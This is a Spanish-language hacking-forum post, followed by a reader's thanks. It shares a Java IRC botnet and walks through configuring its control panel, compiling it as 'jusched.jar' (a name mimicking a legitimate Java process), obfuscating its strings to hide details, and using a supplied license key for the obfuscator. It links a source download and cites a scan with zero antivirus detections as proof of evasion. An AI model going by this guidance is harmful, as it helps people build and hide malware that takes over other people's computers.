Les traigo esta botnet en java. Para todos aquellos que les guste este lenguaje les vendra bien para estudiar su codigo.
(http://www.tequilavalley.com/wp-content/uploads/2009/06/java.png)
Bueno, lo primero que debemos saber es saber utilizar el IRC (Comandos y demas)
Recomiendo que hagan un servidor y canal propio para evitar que les den de baja. En la Malware Magazine #3 explico como crear un servidor de IRC en su propia PC.
Bueno, sigamos. Una vez que tengamos todo, vamos a editar el archivo "config.php" Recuerden rellenar todos los campos.. Una vez editado y subido deben recordar la URL para poderlo ver.
A continuación editamos "Constants.java" Esto es lo que puede abrir en el Bloc de notas para editar. Es bastante fácil de editar. No se preocupen demasiado por las cosas de copia de seguridad. recuerden la URL de el "config.php" subido para colocarle la misma direccion en este archivo de java.
Una vez que tenemos esto, tenemos que compilarlo. Asegurense de tener Java JDK.
http://java.sun.com/javase/downloads/index.jsp
Ahora entra en tu red de bots y haga clic en "Compilar a.bat" Si no estas seguro, hace click derecho y click en editar, esto te permitira ver la fuente.
Y Ahora deberia ver un monton de Archivos de clase. Ahora haga clic en "Compile.bat" Esto hará un "archivo" llamado "jusched.jar", Y esta sera tu botnet.
Para probar que ha trabajado haga click en el archivo (hay dos voy a explicar el otro después) y deberia unirse al canal IRC que configuraste previamente. Si mantiene la configuración de nick sería como [Bot] 84073857340 por ejemplo.
Para desinfectarse de su botnet entrar en> Inicio> Ejecutar msconfig jusched.jar>> inicio y quitar y haga click en Aplicar. En el IRC, haga doble click para abrir un chat privado entre usted y la botnet y escribir el comando ". Salida" Entonces, de esta forma, salimos de la botnet.
El archivo que se crea lo que hace es cifrar todo para que no se puedan ver los detalles dela misma. Para esto he añadido "jshrink.jar" Arrastrar el archivo y a continuación, click en la pestaña de opciones "Encriptar cuerdas" Para el codigo de licencia.
De todas formas les dejo el codigo de la licencia aca:
Código:
31-12-2099 CANCQJUQKEOQKKLI
Descargar Botnet [SC] (http://www.multiupload.com/WEXYRIUVB2)
File Info
Report date: 2010-09-21 20:00:21 (GMT 1)
File name: jusched-jar
File size: 54066 bytes
MD5 Hash: 24f9ca7107915de4458cba0d6d0f4028
SHA1 Hash: c0e6a4c2d4316d1b1088e845acfcc20b102b36e7
Detection rate: 0 on 16 (0%)
Status: CLEAN
Detections
a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -
Scan report generated by
NoVirusThanks.org
Van a ver un Exe ahi adentro, les dejo el scan de anubis del mismo:
http://anubis.iseclab.org/?action=result&task_id=19d975888ecf2a224393a9e423bb2388c&format=html
Great great great, quiero ver ese source, hoy amo Java :D y pensar que antes no tenia ojos para otro lenguaje que no fuera C ,
se agradece .